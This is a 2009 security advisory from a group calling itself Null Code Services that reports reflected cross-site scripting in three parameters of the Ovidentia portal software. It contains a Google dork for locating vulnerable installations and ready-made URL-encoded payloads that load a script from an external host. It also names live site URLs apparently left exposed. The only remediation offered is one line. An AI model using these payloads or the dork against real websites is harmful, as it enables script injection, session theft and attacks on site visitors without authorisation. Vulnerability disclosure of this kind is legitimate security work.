NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs! +===================================================================================================================+ + Copyright 2008 - ovidentia //Cross-site scripting (XSS) Remote Java Execution + +===================================================================================================================+ Author(s): Ivan Sanchez Product: ovidentia "Ovidentia is a portal Generator for companies, organizations or communities allowing an administrable management for publications of informations, forums of discussions, shareable diaries, FAQs, Workflow, file sharing and mail interface." (In the past the same product has had problems with Sql Injection and other Xss, today I saw the internal code, and I saw much more mistakes.) http://www.ovidentia.org http://www.cantico.fr Date: 12/01/2009 GOOGLE DORKS: ------------ intext:"Powered by Ovidentia" Parameters Affected(3): ----------------------- 1- pat= http://domain/index.php?tg=search&pat=%22%3E%3Cscript%20src=http://external-site/thirdparty/scripts/nullcode.js%3E%3C/script%3E 2- smap_node_id==%22%3E%3Cscript%20src=http://external-site/thirdparty/scripts/nullcode.js%3E%3C/script%3E 3- replace =abcdefgh to %22%3E%3Cscript%20src=http://external-site/thirdparty/scripts/nullcode.js%3E%3C/script%3E Remediation: Validate the Input. ------------ http://www.ovidentia.org/index.php?tg=oml&file=download.html&smap_node_id= http://ovidentia.opensourcehosting.cz/index.php?tg=search&pat= NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs! +===================================================================================================================+ + Copyright 2008 - ovidentia // Cross-site scripting (XSS) Remote Java Execution + +===================================================================================================================+